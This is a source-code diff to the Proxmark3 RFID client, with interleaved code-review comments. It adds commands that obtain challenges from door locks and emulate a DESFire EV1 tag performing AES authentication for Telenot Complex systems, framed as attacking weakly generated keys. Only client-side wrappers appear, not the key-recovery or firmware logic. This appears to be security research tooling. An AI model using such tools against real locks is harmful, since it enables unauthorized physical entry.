index 1e29eb1398..e21640fcdd 100644
--- a/client/src/cmdhf.c
+++ b/client/src/cmdhf.c
@@ -34,6 +34,7 @@
 #include "cmdhfmfu.h" // ULTRALIGHT/NTAG etc
 #include "cmdhfmfp.h" // Mifare Plus
 #include "cmdhfmfdes.h" // DESFIRE
+#include "cmdhfmfdesbrute.h" // partial DESFIRE EV1 emulation
 #include "cmdhftopaz.h" // TOPAZ
 #include "cmdhffelica.h" // ISO18092 / FeliCa
 #include "cmdhffido.h" // FIDO authenticators
@@ -429,6 +430,7 @@ static command_t CommandTable[] = {
 {"mfp", CmdHFMFP, AlwaysAvailable, "{ MIFARE Plus RFIDs... }"},
 {"mfu", CmdHFMFUltra, AlwaysAvailable, "{ MIFARE Ultralight RFIDs... }"},
 {"mfdes", CmdHFMFDes, AlwaysAvailable, "{ MIFARE Desfire RFIDs... }"},
+ {"mfdesbrute", CmdHfMfDesBrute, AlwaysAvailable, "{ MIFARE DESFIRE EV1 Brute Forcing... }"},
 {"seos", CmdHFSeos, AlwaysAvailable, "{ SEOS RFIDs... }"},
 {"st25ta", CmdHFST25TA, AlwaysAvailable, "{ ST25TA RFIDs... }"},
 {"thinfilm", CmdHFThinfilm, AlwaysAvailable, "{ Thinfilm RFIDs... }"},
diff --git a/client/src/cmdhfmfdesbrute.c b/client/src/cmdhfmfdesbrute.c
new file mode 100644
index 0000000000..296310faa5
--- /dev/null
+++ b/client/src/cmdhfmfdesbrute.c
@@ -0,0 +1,246 @@ +//----------------------------------------------------------------------------- +// Copyright (C) X41 D-Sec GmbH, Yasar Klawohn, Markus Vervier +// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details. +// +// This program is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// This program is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// See LICENSE.txt for the text of the license. +//----------------------------------------------------------------------------- +// High frequency ISO14443A commands +//----------------------------------------------------------------------------- +#include "cmdhfmfdesbrute.h" +#include +#include +#include "cmdparser.h" // command_t +#include "commonutil.h" // ARRAYLEN +#include "comms.h" // clearCommandBuffer +#include "cmdtrace.h" +#include "cliparser.h" +#include "cmdhfmf.h" +#include "cmdhfmfu.h" +#include "iso7816/iso7816core.h" +#include "emv/emvcore.h" +#include "ui.h" +#include "crc16.h" +#include "util_posix.h" // msclock +#include "aidsearch.h" +#include "cmdhf.h" // handle HF plot +#include "cliparser.h" +#include "protocols.h" // definitions of ISO14A/7816 protocol, MAGIC_GEN_1A +#include "iso7816/apduinfo.h" // GetAPDUCodeDescription +#include "nfc/ndef.h" // NDEFRecordsDecodeAndPrint +#include "cmdnfc.h" // print_type4_cc_info +#include "fileutils.h" // saveFile +#include "atrs.h" // getATRinfo + +static int CmdHelp(const char *Cmd); + +// ## simulate iso14443a tag +int CmdHfMfDesBruteGetChallenge(const char *Cmd) { + CLIParserContext *ctx; + CLIParserInit(&ctx, "hf mfdesbrute get_challenge", + "Tools for attacking 
weakly generated keys", // TODO fix description + "hf mfdesbrute get_challenge -t -u "); + + void *argtable[] = { + arg_param_begin, + arg_int1("t", "type", "<1-10> ", "Simulation type to use"), + arg_str0("u", "uid", "", "7 byte UID"), + //arg_lit0("v", "verbose", "verbose output"), + arg_param_end + }; + CLIExecWithReturn(ctx, Cmd, argtable, false); + + int tagtype = arg_get_int(ctx, 1); + + int uid_len = 0; + uint8_t uid[10] = {0}; + CLIGetHexWithReturn(ctx, 2, uid, &uid_len); + + uint16_t flags = 0; + bool useUIDfromEML = true; + + if (uid_len > 0) { + if (uid_len == 7) { + flags |= FLAG_7B_UID_IN_DATA; + } else { + PrintAndLogEx(ERR, "Please specify a 7 byte UID"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + PrintAndLogEx(SUCCESS, "Emulating a" _YELLOW_("DESFIRE EV1 tag")" with " _GREEN_("%d byte UID (%s)"), uid_len, sprint_hex(uid, uid_len)); + useUIDfromEML = false; + } + + CLIParserFree(ctx); + + sector_t *k_sector = NULL; + uint8_t k_sectorsCount = 40; + + if (useUIDfromEML) { + flags |= FLAG_UID_IN_EMUL; + } + + struct { + uint8_t tagtype; + uint16_t flags; + uint8_t uid[10]; + uint8_t key[16]; + } PACKED payload; + + payload.tagtype = tagtype; + payload.flags = flags; + memcpy(payload.uid, uid, uid_len); + memset(payload.key, 0, 16); + + clearCommandBuffer(); + SendCommandNG(CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE, (uint8_t *)&payload, sizeof(payload)); + PacketResponseNG resp; + + PrintAndLogEx(INFO, "Press pm3-button to abort simulation"); + bool keypress = kbd_enter_pressed(); + while (!keypress) { + + if (WaitForResponseTimeout(CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE, &resp, 1500) == 0) continue; + if (resp.status != PM3_SUCCESS) break; + + keypress = kbd_enter_pressed(); + } + + if (keypress) { + if ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK) { + // inform device to break the sim loop since client has exited + SendCommandNG(CMD_BREAK_LOOP, NULL, 0); + } + + if (resp.status == PM3_EOPABORTED && ((flags & FLAG_NR_AR_ATTACK) == 
FLAG_NR_AR_ATTACK)) { + showSectorTable(k_sector, k_sectorsCount); + } + } + + PrintAndLogEx(INFO, "Done"); + return PM3_SUCCESS; +} + +int CmdHfMfDesBruteOpenDoor(const char *Cmd) { + CLIParserContext *ctx; + CLIParserInit(&ctx, "hf mfdesbrute open_door", + "Tools for attacking weakly generated keys", // TODO fix description + "hf mfdesbrute open_door -t -u -k "); + + void *argtable[] = { + arg_param_begin, + arg_int1("t", "type", "<1-10> ", "Simulation type to use"), + arg_str0("u", "uid", "", "7 byte UID"), + arg_str0("k", "key", "", "16 byte key"), + //arg_lit0("v", "verbose", "verbose output"), + arg_param_end + }; + CLIExecWithReturn(ctx, Cmd, argtable, false); + + int tagtype = arg_get_int(ctx, 1); + + int uid_len = 0; + uint8_t uid[10] = {0}; + CLIGetHexWithReturn(ctx, 2, uid, &uid_len); + + uint16_t flags = 0; + bool useUIDfromEML = true; + + if (uid_len > 0) { + if (uid_len == 7) { + flags |= FLAG_7B_UID_IN_DATA; + } else { + PrintAndLogEx(ERR, "Please specify a 7 byte UID"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + PrintAndLogEx(SUCCESS, "Emulating a" _YELLOW_("DESFIRE EV1 tag")" with " _GREEN_("%d byte UID (%s)"), uid_len, sprint_hex(uid, uid_len)); + useUIDfromEML = false; + } + + int key_len = 0; + uint8_t key[16] = {0}; + CLIGetHexWithReturn(ctx, 3, key, &key_len); + + if (key_len != 16) { + PrintAndLogEx(ERR, "Please specify a key of length 16"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + + CLIParserFree(ctx); + + sector_t *k_sector = NULL; + uint8_t k_sectorsCount = 40; + + if (useUIDfromEML) { + flags |= FLAG_UID_IN_EMUL; + } + + struct { + uint8_t tagtype; + uint16_t flags; + uint8_t uid[10]; + uint8_t key[16]; + } PACKED payload; + + payload.tagtype = tagtype; + payload.flags = flags; + memcpy(payload.uid, uid, uid_len); + memcpy(payload.key, key, key_len); + + clearCommandBuffer(); + SendCommandNG(CMD_HF_MIFARE_EV1_OPEN_DOOR, (uint8_t *)&payload, sizeof(payload)); + PacketResponseNG resp; + + PrintAndLogEx(INFO, "Press 
pm3-button to abort simulation"); + bool keypress = kbd_enter_pressed(); + while (!keypress) { + + if (WaitForResponseTimeout(CMD_HF_MIFARE_EV1_OPEN_DOOR, &resp, 1500) == 0) continue; + if (resp.status != PM3_SUCCESS) break; + + keypress = kbd_enter_pressed(); + } + + if (keypress) { + if ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK) { + // inform device to break the sim loop since client has exited + SendCommandNG(CMD_BREAK_LOOP, NULL, 0); + } + + if (resp.status == PM3_EOPABORTED && ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK)) { + showSectorTable(k_sector, k_sectorsCount); + } + } + + PrintAndLogEx(INFO, "Done"); + return PM3_SUCCESS; +} + +static command_t CommandTable[] = { + {"help", CmdHelp, AlwaysAvailable, "This help"}, + {"get_challenge", CmdHfMfDesBruteGetChallenge, IfPm3Iso14443a, "Get a challenge from a lock"}, + {"open_door", CmdHfMfDesBruteOpenDoor, IfPm3Iso14443a, "AES auth simulation for Telenot Complex systems"}, + {NULL, NULL, NULL, NULL} +}; + +static int CmdHelp(const char *Cmd) { + (void)Cmd; // Cmd is not used so far + CmdsHelp(CommandTable); + return PM3_SUCCESS; +} + +int CmdHfMfDesBrute(const char *Cmd) { + clearCommandBuffer(); + return CmdsParse(CommandTable, Cmd); +} diff --git a/client/src/cmdhfmfdesbrute.h b/client/src/cmdhfmfdesbrute.h new file mode 100644 index 0000000000..09f4d563d5 --- /dev/null +++ b/client/src/cmdhfmfdesbrute.h 
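Review bot: `payload` is an uninitialised stack struct and `memcpy(payload.uid, uid, uid_len)` fills only `uid_len` bytes, so in both CmdHfMfDesBruteGetChallenge and CmdHfMfDesBruteOpenDoor the remaining `uid` bytes sent to the device are stack residue; declaring it `} PACKED payload = {0};` fixes that. `tagtype` is narrowed from `int` to `uint8_t` without checking the documented 1-10 range. In the wait loop, `continue` on a timeout skips `keypress = kbd_enter_pressed();`, so the loop cannot be left from the keyboard while no response arrives, and `resp.status` can be read afterwards before any response was stored. The `k_sector`/`FLAG_NR_AR_ATTACK` code cannot run here because that flag is never set, and the two near-identical functions could share a helper that takes the command id and key.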
@@ -0,0 +1,28 @@
+//-----------------------------------------------------------------------------
+// Copyright (C) X41 D-Sec GmbH, Yasar Klawohn, Markus Vervier
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+// High frequency ISO14443A commands
+//-----------------------------------------------------------------------------
+
+#ifndef CMDHFMFDESBRUTE_H__
+#define CMDHFMFDESBRUTE_H__
+
+//static int CmdHelp(const char *Cmd);
+int CmdHfMfDesBrute(const char *Cmd);
+int CmdHfMfDesBruteGetChallenge(const char *Cmd);
+int CmdHfMfDesBruteOpenDoor(const char *Cmd);
+
+#endif
diff --git a/client/src/pm3line_vocabulory.h b/client/src/pm3line_vocabulory.h
index 63a438f6d1..23e2a04417 100644
--- a/client/src/pm3line_vocabulory.h
+++ b/client/src/pm3line_vocabulory.h
@@ -395,6 +395,9 @@ const static vocabulory_t vocabulory[] = {
 { 0, "hf mfdes value" },
 { 0, "hf mfdes clearrecfile" },
 { 1, "hf mfdes test" },
+ { 1, "hf mfdesbrute help" },
+ { 0, "hf mfdesbrute get_challenge" },
+ { 0, "hf mfdesbrute open_door" },
 { 1, "hf seos help" },
 { 0, "hf seos info" },
 { 1, "hf seos list" },
diff --git a/doc/commands.json b/doc/commands.json
index e3c68d3fca..5da747b4c5 100644
--- a/doc/commands.json
+++ b/doc/commands.json
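Review bot: The banner comment `// High frequency ISO14443A commands` in the new cmdhfmfdesbrute.h does not describe this module. Going by the command table in cmdhfmfdesbrute.c, it holds the DESFire EV1 lock-challenge and AES-auth simulation commands, so I would write `// High frequency MIFARE DESFire EV1 lock challenge and AES auth simulation commands`. The commented-out prototype `//static int CmdHelp(const char *Cmd);` is dead text and can be dropped. `CmdHfMfDesBruteGetChallenge` and `CmdHfMfDesBruteOpenDoor` are reached through `CommandTable` in the .c file; if no other translation unit calls them (not visible here), making them `static` and exporting only `CmdHfMfDesBrute` keeps the exported surface small.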
@@ -2563,7 +2563,7 @@ }, "hf help": { "command": "hf help", - "description": "-------- ----------------------- high frequency ----------------------- 14a { iso14443a rfids... } 14b { iso14443b rfids... } 15 { iso15693 rfids... } cipurse { cipurse transport cards... } epa { german identification card... } emrtd { machine readable travel document... } felica { iso18092 / felica rfids... } fido { fido and fido2 authenticators... } gallagher { gallagher desfire rfids... } ksx6924 { ks x 6924 (t-money, snapper+) rfids } jooki { jooki rfids... } iclass { iclass rfids... } legic { legic rfids... } lto { lto cartridge memory rfids... } mf { mifare rfids... } mfp { mifare plus rfids... } mfu { mifare ultralight rfids... } mfdes { mifare desfire rfids... } seos { seos rfids... } st25ta { st25ta rfids... } thinfilm { thinfilm rfids... } topaz { topaz (nfc type 1) rfids... } waveshare { waveshare nfc epaper... } ----------- --------------------- general --------------------- help this help list list protocol data in trace buffer search search for known hf tags --------------------------------------------------------------------------------------- hf list available offline: yes alias of `trace list -t raw` with selected protocol data to annotate trace buffer you can load a trace from file (see `trace load -h`) or it be downloaded from device by default it accepts all other arguments of `trace list`. note that some might not be relevant for this specific protocol", + "description": "-------- ----------------------- high frequency ----------------------- 14a { iso14443a rfids... } 14b { iso14443b rfids... } 15 { iso15693 rfids... } cipurse { cipurse transport cards... } epa { german identification card... } emrtd { machine readable travel document... } felica { iso18092 / felica rfids... } fido { fido and fido2 authenticators... } gallagher { gallagher desfire rfids... } ksx6924 { ks x 6924 (t-money, snapper+) rfids } jooki { jooki rfids... } iclass { iclass rfids... 
} legic { legic rfids... } lto { lto cartridge memory rfids... } mf { mifare rfids... } mfp { mifare plus rfids... } mfu { mifare ultralight rfids... } mfdes { mifare desfire rfids... } mfdesbrute { mifare desfire ev1 brute forcing... } seos { seos rfids... } st25ta { st25ta rfids... } thinfilm { thinfilm rfids... } topaz { topaz (nfc type 1) rfids... } waveshare { waveshare nfc epaper... } ----------- --------------------- general --------------------- help this help list list protocol data in trace buffer search search for known hf tags --------------------------------------------------------------------------------------- hf list available offline: yes alias of `trace list -t raw` with selected protocol data to annotate trace buffer you can load a trace from file (see `trace load -h`) or it be downloaded from device by default it accepts all other arguments of `trace list`. note that some might not be relevant for this specific protocol", "notes": [ "hf list -f -> show frame delay times", "hf list -1 -> use trace buffer" 
@@ -5323,15 +5323,17 @@ }, "hf mfdes test": { "command": "hf mfdes test", - "description": "[=] ------ desfire tests ------ [!] no space for crc. pos: 1 [=] crc16............. passed [!] no space for crc. pos: 2 [=] crc32............. passed [=] cmac subkeys...... passed [=] an10922 aes....... passed [=] an10922 2tdea..... passed [=] an10922 3tdea..... passed [=] cmac 3tdea........ passed [=] cmac 2tdea........ passed [=] cmac des.......... passed [=] ev2 session keys.. passed [=] ev2 iv calc....... passed [=] ev2 mac calc...... passed [=] trans session key. passed [=] lrp plaintexts.... passed [=] lrp updated keys.. passed [=] lrp eval.......... passed [=] lrp inc counter... passed [=] lrp encode........ passed [=] lrp decode........ passed [=] lrp subkeys....... passed [=] lrp cmac.......... passed [=] lrp session keys.. passed [=] --------------------------- [+] tests [ ok ] ======================================================================================= hf seos { seos rfids... } --------------------------------------------------------------------------------------- hf seos help available offline: yes help this help list list seos history --------------------------------------------------------------------------------------- hf seos info available offline: no get info from seos tags", + "description": "[=] ------ desfire tests ------ [!] no space for crc. pos: 1 [=] crc16............. passed [!] no space for crc. pos: 2 [=] crc32............. passed [=] cmac subkeys...... passed [=] an10922 aes....... passed [=] an10922 2tdea..... passed [=] an10922 3tdea..... passed [=] cmac 3tdea........ passed [=] cmac 2tdea........ passed [=] cmac des.......... passed [=] ev2 session keys.. passed [=] ev2 iv calc....... passed [=] ev2 mac calc...... passed [=] trans session key. passed [=] lrp plaintexts.... passed [=] lrp updated keys.. passed [=] lrp eval.......... passed [=] lrp inc counter... passed [=] lrp encode........ passed [=] lrp decode........ 
passed [=] lrp subkeys....... passed [=] lrp cmac.......... passed [=] lrp session keys.. passed [=] --------------------------- [+] tests [ ok ] ======================================================================================= hf mfdesbrute { mifare desfire ev1 brute forcing... } --------------------------------------------------------------------------------------- hf mfdesbrute help available offline: yes help this help --------------------------------------------------------------------------------------- hf mfdesbrute get_challenge available offline: no tools for attacking weakly generated keys", "notes": [ - "hf seos info" + "hf mfdesbrute get_challenge -t -u " ], "offline": true, "options": [ - "-h, --help this help" + "-h, --help this help", + "-t, --type <1-10> simulation type to use", + "-u, --uid 7 byte uid" ], - "usage": "hf seos info [-h]" + "usage": "hf mfdesbrute get_challenge [-h] -t <1-10> [-u ]" }, "hf mfdes value": { "command": "hf mfdes value", @@ -5414,6 +5416,21 @@ ], "usage": "hf mfdes write [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-d ] [--debit] [--commit] [--updaterec ] [--isoid ] [--fileisoid ] [--readerid ] [--trkey ]" }, + "hf mfdesbrute open_door": { + "command": "hf mfdesbrute open_door", + "description": "tools for attacking weakly generated keys", + "notes": [ + "hf mfdesbrute open_door -t -u -k " + ], + "offline": false, + "options": [ + "-h, --help this help", + "-t, --type <1-10> simulation type to use", + "-u, --uid 7 byte uid", + "-k, --key 16 byte key" + ], + "usage": "hf mfdesbrute open_door [-h] -t <1-10> [-u ] [-k ]" + }, "hf mfp auth": { "command": "hf mfp auth", "description": "executes aes authentication command for mifare plus card", 
@@ -5886,6 +5903,18 @@ ], "usage": "hf search [-hv]" }, + "hf seos help": { + "command": "hf seos help", + "description": "help this help list list seos history --------------------------------------------------------------------------------------- hf seos info available offline: no get info from seos tags", + "notes": [ + "hf seos info" + ], + "offline": true, + "options": [ + "-h, --help this help" + ], + "usage": "hf seos info [-h]" + }, "hf seos list": { "command": "hf seos list", "description": "alias of `trace list -t 7816` with selected protocol data to annotate trace buffer you can load a trace from file (see `trace load -h`) or it be downloaded from device by default it accepts all other arguments of `trace list`. note that some might not be relevant for this specific protocol", @@ -10402,8 +10431,8 @@ } }, "metadata": { - "commands_extracted": 605, + "commands_extracted": 607, "extracted_by": "PM3Help2JSON v1.00", - "extracted_on": "2022-02-09T14:20:29" + "extracted_on": "2022-02-09T14:29:46" } } \ No newline at end of file diff --git a/doc/commands.md b/doc/commands.md index 35444f00b5..14ffeb4552 100644 --- a/doc/commands.md +++ b/doc/commands.md @@ -576,6 +576,17 @@ Check column "offline" for their availability. |`hf mfdes test `|Y |`Test crypto` +### hf mfdesbrute + + { MIFARE DESFIRE EV1 Brute Forcing... } + +|command |offline |description +|------- |------- |----------- +|`hf mfdesbrute help `|Y |`This help` +|`hf mfdesbrute get_challenge`|N |`Get a challenge from a lock` +|`hf mfdesbrute open_door`|N |`AES auth simulation for Telenot Complex systems` + + ### hf seos { SEOS RFIDs... } diff --git a/include/pm3_cmd.h b/include/pm3_cmd.h index 94eb4d9c00..2f581fde4b 100644 --- a/include/pm3_cmd.h +++ b/include/pm3_cmd.h 
@@ -639,6 +639,9 @@ typedef struct { #define CMD_HF_DESFIRE_INFO 0x072d #define CMD_HF_DESFIRE_COMMAND 0x072e +#define CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE 0x1000 +#define CMD_HF_MIFARE_EV1_OPEN_DOOR 0x1001 + #define CMD_HF_MIFARE_NACK_DETECT 0x0730 #define CMD_HF_MIFARE_STATIC_NONCE 0x0731 diff --git a/include/protocols.h b/include/protocols.h index b13de57ec8..335b560d08 100644 --- a/include/protocols.h +++ b/include/protocols.h @@ -194,6 +194,11 @@ ISO 7816-4 Basic interindustry commands. For command APDU's. #define MIFARE_EV1_UIDF1 0x40 #define MIFARE_EV1_UIDF2 0x20 #define MIFARE_EV1_UIDF3 0x60 +#define MIFARE_EV1_SELECT_APP 0x5A +#define MIFARE_EV1_AUTH_AES 0xAA +#define MIFARE_EV1_AUTH_AES_2 0xAF +#define MIFARE_EV1_GET_FILE_INFO 0xF5 +#define MIFARE_EV1_READ_DATA 0xBD #define MIFARE_ULC_WRITE 0xA2 #define MIFARE_ULC_COMP_WRITE 0xA0
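Review bot: In the pm3_cmd.h hunk, `CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE 0x1000` and `CMD_HF_MIFARE_EV1_OPEN_DOOR 0x1001` are placed between `0x072e` and `0x0730` but numbered outside that range, and nothing in the hunk shows whether 0x1000/0x1001 are already assigned elsewhere in this header. Please confirm the values are unique, or take ids from the surrounding block, since a duplicate id would route a packet to the wrong firmware handler. The OPEN_DOOR payload is an anonymous packed struct declared locally in the client, so the firmware has to mirror that layout by hand. A comment next to the define, such as `// payload (packed): uint8_t tagtype; uint16_t flags; uint8_t uid[10]; uint8_t key[16]`, or a shared typedef in this header, would keep both sides in step. The surrounding definitions continue outside the hunk.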